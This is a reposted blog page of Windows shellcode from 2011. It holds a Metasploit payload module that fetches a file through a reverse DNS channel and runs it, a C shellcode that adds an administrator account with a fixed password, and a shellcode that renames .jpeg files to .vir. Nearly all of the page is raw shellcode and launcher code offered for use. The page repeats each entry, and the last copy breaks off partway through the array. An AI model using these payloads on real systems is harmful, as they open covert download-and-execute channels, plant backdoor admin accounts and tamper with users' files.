
Monday, August 08, 2011

download & execute file via reverse DNS channel

# Shellcode: download and execute file via reverse DNS channel
    #
    #
    # Features:
    # * Windows 7 tested
    # * No UAC interaction needed (the DNS lookups are issued by svchost.exe on the process's behalf via getaddrinfo)
    # * Firewall/Router/NAT/Proxy bypass: reverse channel over DNS (like dnscat does, but without sockets, and stable)
    # * NO SOCKET
    #
    # DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
    #
    #
    # By Alexey Sintsov
    #      [DSecRG]
    #    a.sintsov [sobachka] dsecrg.com
    #    dookie [sobachka] inbox.ru
    #
    # P.S. Works on Vista/7/2008.
    #      Does not work on XP/2003 out of the box, because IPv6 is not installed there by default;
    #      it can work on XP/2003 once IPv6 is installed
    #      (it does not need to be enabled, just installed).
    
    require 'msf/core'
    
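    module Metasploit3
    
        include Msf::Payload::Windows
        include Msf::Payload::Single
    
        # Widths of the two slots that generate_stage patches into the shellcode.
        # They are fixed by the jump chain in 'Begin': the "\xeb\x7a" jmp lands on
        # the "\xeb\x13" just before "fclose", which lands on the "\x5e" (pop esi)
        # that opens 'Payload1' -- so neither slot may grow or shrink.
        DOMAIN_SLOT = 10   # "." + domain, \xFF-padded
        EXT_SLOT    = 4    # extension (+1 per byte), \x01-padded
    
        def initialize(info = {})
            super(update_info(info,
                'Name'          => 'DNS_DOWNLOAD_EXEC',
                'Version'      => '0.01',
                'Description'  => 'Download and Exec (via DNS)',
                'Author'        => [ 'Alexey Sintsov' ],
                'License'      => MSF_LICENSE,
                'Platform'      => 'win',
                'Arch'          => ARCH_X86,
                'Payload'      =>
                    {
                        'Offsets' =>{ },
    
                        # Entry jmp/call/pop plus the \xFF-separated import table the
                        # stub resolves at run time: GetProcAddress, GetTempPathA,
                        # WinExec, ExitThread, LoadLibraryA, ws2_32 / WSAStartup /
                        # getaddrinfo, msvcrt / fopen / fwrite / fclose. Payload1's
                        # first loop copies this table to the stack and rewrites every
                        # \xFF to \x00, which is why \xFF is the separator and pad byte.
                        'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
    
                        # Locates kernel32 by walking the PEB loader list (the
                        # "\x64\x8b\x71\x30" fs:[0x30] access), resolves the names
                        # above through GetProcAddress and sets up the temp path, so
                        # unlike fixed-address shellcode it is not tied to one build.
                        'Payload1' =>            "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
    
                        # Opens with "\xba\x01\x01\x01\x01\x2b\xc2": subtracts 1 from each
                        # byte of the extension dword that generate_stage inserted just
                        # before it. Then the DNS query loop (getaddrinfo), the write of
                        # the received data to the temp file (fopen/fwrite/fclose) and
                        # finally WinExec of `cmd /c "<file>"` and ExitThread.
                        'Payload2' =>    "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
    
                    }
                ))
    
            # The stub always finishes with ExitThread(0) (the name is in 'Begin'),
            # so the usual EXITFUNC choice does not apply.
            deregister_options('EXITFUNC')
    
            # DOMAIN is the zone the DNS handler (revdns) is authoritative for;
            # FILE is the extension of the dropped file, which decides how WinExec
            # runs it. FILE is required, so it now also carries the documented
            # 'vbs' default instead of only mentioning it.
            register_options(
                [
                    OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
                    OptString.new('FILE', [ true, "Filename extension (default VBS)", 'vbs' ]),
                ], self.class)
        end
    
        #
        # Constructs the payload:
        #   'Begin' + "." + DOMAIN + 'Payload1' + FILE + 'Payload2'
        #
        # DOMAIN goes into a 10-byte \xFF-padded slot (the option text promises 9;
        # 10 still fits because 'Payload1' opens with the \xFF that terminates it).
        # FILE goes into a 4-byte slot with every byte incremented by one and
        # \x01 padding: 'Payload2' starts by subtracting 0x01010101 from that
        # dword, which restores the text and turns the padding into the NUL that
        # terminates the temp file name -- so at most 3 characters are usable.
        #
        # Raises ArgumentError when either option would overflow its slot (the
        # original silently emitted a corrupted stage). The datastore strings are
        # duplicated before being patched: the original incremented
        # datastore['FILE'] in place, so a second call produced different bytes.
        #
        def generate_stage
            domain = (datastore['DOMAIN'] || '').dup
            extens = (datastore['FILE'] || 'vbs').dup
    
            if domain.length > DOMAIN_SLOT
                raise ArgumentError, "DOMAIN must be at most #{DOMAIN_SLOT} bytes, got #{domain.length}"
            end
            if extens.length > EXT_SLOT - 1
                raise ArgumentError, "FILE must be at most #{EXT_SLOT - 1} bytes, got #{extens.length}"
            end
    
            # e.g. "exe" -> "fyf\x01"; presumably the +1 keeps the extension free of
            # the \x00/\xFF bytes the stub treats specially.
            ext_slot = extens.unpack('C*').map { |b| (b + 1).chr }.join.ljust(EXT_SLOT, "\x01")
    
            # "." + domain, padded to the fixed slot width.
            domain_slot = "\x2e" + domain.ljust(DOMAIN_SLOT, "\xFF")
    
            module_info['Payload']['Begin'] + domain_slot +
                module_info['Payload']['Payload1'] + ext_slot +
                module_info['Payload']['Payload2']
        end
    
    end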

download & execute file via reverse DNS channel

# Shellcode: download and execute file via reverse DNS channel
    #
    #
    # Features:
    # * Windows 7 tested
    # * No UAC interaction needed (the DNS lookups are issued by svchost.exe on the process's behalf via getaddrinfo)
    # * Firewall/Router/NAT/Proxy bypass: reverse channel over DNS (like dnscat does, but without sockets, and stable)
    # * NO SOCKET
    #
    # DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
    #
    #
    # By Alexey Sintsov
    #      [DSecRG]
    #    a.sintsov [sobachka] dsecrg.com
    #    dookie [sobachka] inbox.ru
    #
    # P.S. Works on Vista/7/2008.
    #      Does not work on XP/2003 out of the box, because IPv6 is not installed there by default;
    #      it can work on XP/2003 once IPv6 is installed
    #      (it does not need to be enabled, just installed).
    
    require 'msf/core'
    
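    module Metasploit3
    
        include Msf::Payload::Windows
        include Msf::Payload::Single
    
        # Widths of the two slots that generate_stage patches into the shellcode.
        # They are fixed by the jump chain in 'Begin': the "\xeb\x7a" jmp lands on
        # the "\xeb\x13" just before "fclose", which lands on the "\x5e" (pop esi)
        # that opens 'Payload1' -- so neither slot may grow or shrink.
        DOMAIN_SLOT = 10   # "." + domain, \xFF-padded
        EXT_SLOT    = 4    # extension (+1 per byte), \x01-padded
    
        def initialize(info = {})
            super(update_info(info,
                'Name'          => 'DNS_DOWNLOAD_EXEC',
                'Version'      => '0.01',
                'Description'  => 'Download and Exec (via DNS)',
                'Author'        => [ 'Alexey Sintsov' ],
                'License'      => MSF_LICENSE,
                'Platform'      => 'win',
                'Arch'          => ARCH_X86,
                'Payload'      =>
                    {
                        'Offsets' =>{ },
    
                        # Entry jmp/call/pop plus the \xFF-separated import table the
                        # stub resolves at run time: GetProcAddress, GetTempPathA,
                        # WinExec, ExitThread, LoadLibraryA, ws2_32 / WSAStartup /
                        # getaddrinfo, msvcrt / fopen / fwrite / fclose. Payload1's
                        # first loop copies this table to the stack and rewrites every
                        # \xFF to \x00, which is why \xFF is the separator and pad byte.
                        'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
    
                        # Locates kernel32 by walking the PEB loader list (the
                        # "\x64\x8b\x71\x30" fs:[0x30] access), resolves the names
                        # above through GetProcAddress and sets up the temp path, so
                        # unlike fixed-address shellcode it is not tied to one build.
                        'Payload1' =>            "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
    
                        # Opens with "\xba\x01\x01\x01\x01\x2b\xc2": subtracts 1 from each
                        # byte of the extension dword that generate_stage inserted just
                        # before it. Then the DNS query loop (getaddrinfo), the write of
                        # the received data to the temp file (fopen/fwrite/fclose) and
                        # finally WinExec of `cmd /c "<file>"` and ExitThread.
                        'Payload2' =>    "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
    
                    }
                ))
    
            # The stub always finishes with ExitThread(0) (the name is in 'Begin'),
            # so the usual EXITFUNC choice does not apply.
            deregister_options('EXITFUNC')
    
            # DOMAIN is the zone the DNS handler (revdns) is authoritative for;
            # FILE is the extension of the dropped file, which decides how WinExec
            # runs it. FILE is required, so it now also carries the documented
            # 'vbs' default instead of only mentioning it.
            register_options(
                [
                    OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
                    OptString.new('FILE', [ true, "Filename extension (default VBS)", 'vbs' ]),
                ], self.class)
        end
    
        #
        # Constructs the payload:
        #   'Begin' + "." + DOMAIN + 'Payload1' + FILE + 'Payload2'
        #
        # DOMAIN goes into a 10-byte \xFF-padded slot (the option text promises 9;
        # 10 still fits because 'Payload1' opens with the \xFF that terminates it).
        # FILE goes into a 4-byte slot with every byte incremented by one and
        # \x01 padding: 'Payload2' starts by subtracting 0x01010101 from that
        # dword, which restores the text and turns the padding into the NUL that
        # terminates the temp file name -- so at most 3 characters are usable.
        #
        # Raises ArgumentError when either option would overflow its slot (the
        # original silently emitted a corrupted stage). The datastore strings are
        # duplicated before being patched: the original incremented
        # datastore['FILE'] in place, so a second call produced different bytes.
        #
        def generate_stage
            domain = (datastore['DOMAIN'] || '').dup
            extens = (datastore['FILE'] || 'vbs').dup
    
            if domain.length > DOMAIN_SLOT
                raise ArgumentError, "DOMAIN must be at most #{DOMAIN_SLOT} bytes, got #{domain.length}"
            end
            if extens.length > EXT_SLOT - 1
                raise ArgumentError, "FILE must be at most #{EXT_SLOT - 1} bytes, got #{extens.length}"
            end
    
            # e.g. "exe" -> "fyf\x01"; presumably the +1 keeps the extension free of
            # the \x00/\xFF bytes the stub treats specially.
            ext_slot = extens.unpack('C*').map { |b| (b + 1).chr }.join.ljust(EXT_SLOT, "\x01")
    
            # "." + domain, padded to the fixed slot width.
            domain_slot = "\x2e" + domain.ljust(DOMAIN_SLOT, "\xFF")
    
            module_info['Payload']['Begin'] + domain_slot +
                module_info['Payload']['Payload1'] + ext_slot +
                module_info['Payload']['Payload2']
        end
    
    end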

Add Admin Shellcode 112 bytes

# Title      : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
    # Author    : KaHPeSeSe
    # Screenshot : http://i53.tinypic.com/289yamq.jpg
    # Desc.      : creates user "kpss" with password "12345" and adds it to the local "Administrators" group (net user ... && net localgroup Administrators ...)
    # Tested on  : PERFECT XP PC1 / SP3
    # Date      : 18/07/2011
    # Not        : a.q kpss :((
     
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
     
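    int main(){
    
        /*
         * 112 bytes: a 34-byte position-independent stub followed by the command
         * "cmd.exe /c net user kpss 12345 /add && net localgroup Administrators /add kpss".
         * The stub (jmp/call/pop) loads the string address into EBX, stores a NUL
         * at [EBX+0x4e] (0x4e is exactly the command length, i.e. the array's own
         * terminating NUL, so the write stays in bounds), pushes (0, string) and
         * calls the absolute address 0x7c86250d, then pushes 0 and calls
         * 0x7c81cb12. Both addresses are hardcoded for the build in the header
         * (Turkish XP SP3) -- presumably kernel32 WinExec and ExitProcess -- and
         * will crash on any other build or on any OS that randomises kernel32.
         */
        unsigned char shellcode[]=
        "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
        "\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
        "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
        "\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
        "\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
        "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
        "\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
    
        /* strlen() returns size_t: %zu, not %d (undefined behaviour, and wrong
         * on 64-bit). The cast avoids the signedness warning on unsigned char. */
        printf("Size = %zu bytes\n", strlen((const char *)shellcode));
        /* The stub's last call presumably never returns; get the line out first. */
        fflush(stdout);
    
        /*
         * Jumps into a stack array. With DEP enabled for the process this faults
         * on the first instruction; copy the bytes into memory mapped
         * PAGE_EXECUTE_READWRITE (VirtualAlloc) before calling if that happens.
         * Running it creates a local administrator account with a known password.
         */
        ((void (*)(void))shellcode)();
    
        return 0;
    }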

Add Admin Shellcode 112 bytes

# Title      : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
    # Author    : KaHPeSeSe
    # Screenshot : http://i53.tinypic.com/289yamq.jpg
    # Desc.      : creates user "kpss" with password "12345" and adds it to the local "Administrators" group (net user ... && net localgroup Administrators ...)
    # Tested on  : PERFECT XP PC1 / SP3
    # Date      : 18/07/2011
    # Not        : a.q kpss :((
     
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
     
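    int main(){
    
        /*
         * 112 bytes: a 34-byte position-independent stub followed by the command
         * "cmd.exe /c net user kpss 12345 /add && net localgroup Administrators /add kpss".
         * The stub (jmp/call/pop) loads the string address into EBX, stores a NUL
         * at [EBX+0x4e] (0x4e is exactly the command length, i.e. the array's own
         * terminating NUL, so the write stays in bounds), pushes (0, string) and
         * calls the absolute address 0x7c86250d, then pushes 0 and calls
         * 0x7c81cb12. Both addresses are hardcoded for the build in the header
         * (Turkish XP SP3) -- presumably kernel32 WinExec and ExitProcess -- and
         * will crash on any other build or on any OS that randomises kernel32.
         */
        unsigned char shellcode[]=
        "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
        "\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
        "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
        "\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
        "\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
        "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
        "\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
    
        /* strlen() returns size_t: %zu, not %d (undefined behaviour, and wrong
         * on 64-bit). The cast avoids the signedness warning on unsigned char. */
        printf("Size = %zu bytes\n", strlen((const char *)shellcode));
        /* The stub's last call presumably never returns; get the line out first. */
        fflush(stdout);
    
        /*
         * Jumps into a stack array. With DEP enabled for the process this faults
         * on the first instruction; copy the bytes into memory mapped
         * PAGE_EXECUTE_READWRITE (VirtualAlloc) before calling if that happens.
         * Running it creates a local administrator account with a known password.
         */
        ((void (*)(void))shellcode)();
    
        return 0;
    }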

Win32 / Windows7 Sp1 - rename .jpeg to .vir

# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
    # Date: July, 23 2011
    # Author: Theuzuki.'
    # Vendor or Software Link: -
    # Version: -
    # Category:: shellcodes
    # Google dork: -
    # Tested on: Windows 7 sp 1
    # Demo site: -
    
    ==================================================
    Made by:
    
    ___________.__            ____ ___              __  .__
    \__    ___/|  |__  ____ |    |  \__________ __|  | _|__|
      |    |  |  |  \_/ __ \|    |  /\___  /  |  \  |/ /  |
      |    |  |  Y  \  ___/|    |  /  /    /|  |  /    <|  |
      |____|  |___|  /\___  >______/  /_____ \____/|__|_ \__|
                    \/    \/Rats Crew      \/ TheCod3r \/ 
    
    
    
    Mail: Uzuki@live.de
    Website: www.thecoder.co.tv
    Nicknames: TheUzuki.' / TheCod3r
    Greeting: TheRats Crew
    ==================================================
    
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    /*
     * Position-independent stub followed by an in-band, NUL-terminated command.
     * jmp +0x16 -> call -0x1b -> pop ebx leaves the address of the string in
     * EBX; the stub pushes (0, string) and calls the absolute address
     * 0x7599e739, then pushes 0 and calls 0x75962a6f. Both addresses are
     * hardcoded for the author's Windows 7 SP1 kernel32 (presumably WinExec and
     * ExitProcess); Windows 7 randomises the kernel32 base per boot, so they
     * will not be valid on another machine or after a reboot.
     * The command line has no /c switch -- confirm that cmd.exe actually runs
     * a bare "REN ..." argument before relying on this; if it does, it renames
     * *.jpeg only in the process's current directory.
     */
    char code[] = "\xeb\x16\x5b\x31\xc0\x50"   /* jmp +0x16; pop ebx; xor eax,eax; push eax */
    "\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"   /* push ebx; mov ebx,0x7599e739; call ebx; xor eax,eax */
    "\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"   /* push eax; mov ebx,0x75962a6f; call ebx; call -0x1b */
    "\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"   /* "cmd.exe" */
    "\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"   /* " REN *.jpe" */
    "\x67\x20\x2a\x2e\x76\x69\x72\x00";          /* "g *.vir" + NUL */
    
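    int main(int argc, char **argv)
    {
        (void)argc;
        (void)argv;
    
        /*
         * Report before jumping into the shellcode. Its final call
         * (push 0; call 0x75962a6f) looks like ExitProcess(0): if it is, control
         * never comes back here, so the original printf -- placed after the call
         * and without a newline -- never produced any output. fflush() makes sure
         * the text is out before the process goes away.
         */
        printf("Renaming all .jpeg files to .vir files");
        fflush(stdout);
    
        /*
         * Jumps into the global code[] data array. With DEP enabled for this
         * process that faults; copy the bytes to an executable mapping first if
         * so. The addresses inside code[] are specific to the author's
         * Windows 7 SP1 kernel32 and will not hold elsewhere.
         */
        ((void (*)(void))code)();
        return 0;
    }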
     

Win32 / Windows7 Sp1 - rename .jpeg to .vir

# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
    # Date: July, 23 2011
    # Author: Theuzuki.'
    # Vendor or Software Link: -
    # Version: -
    # Category:: shellcodes
    # Google dork: -
    # Tested on: Windows 7 sp 1
    # Demo site: -
    
    ==================================================
    Made by:
    
    ___________.__            ____ ___              __  .__
    \__    ___/|  |__  ____ |    |  \__________ __|  | _|__|
      |    |  |  |  \_/ __ \|    |  /\___  /  |  \  |/ /  |
      |    |  |  Y  \  ___/|    |  /  /    /|  |  /    <|  |
      |____|  |___|  /\___  >______/  /_____ \____/|__|_ \__|
                    \/    \/Rats Crew      \/ TheCod3r \/ 
    
    
    
    Mail: Uzuki@live.de
    Website: www.thecoder.co.tv
    Nicknames: TheUzuki.' / TheCod3r
    Greeting: TheRats Crew
    ==================================================
    
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    /*
     * Position-independent stub followed by an in-band, NUL-terminated command.
     * jmp +0x16 -> call -0x1b -> pop ebx leaves the address of the string in
     * EBX; the stub pushes (0, string) and calls the absolute address
     * 0x7599e739, then pushes 0 and calls 0x75962a6f. Both addresses are
     * hardcoded for the author's Windows 7 SP1 kernel32 (presumably WinExec and
     * ExitProcess); Windows 7 randomises the kernel32 base per boot, so they
     * will not be valid on another machine or after a reboot.
     * The command line has no /c switch -- confirm that cmd.exe actually runs
     * a bare "REN ..." argument before relying on this; if it does, it renames
     * *.jpeg only in the process's current directory.
     */
    char code[] = "\xeb\x16\x5b\x31\xc0\x50"   /* jmp +0x16; pop ebx; xor eax,eax; push eax */
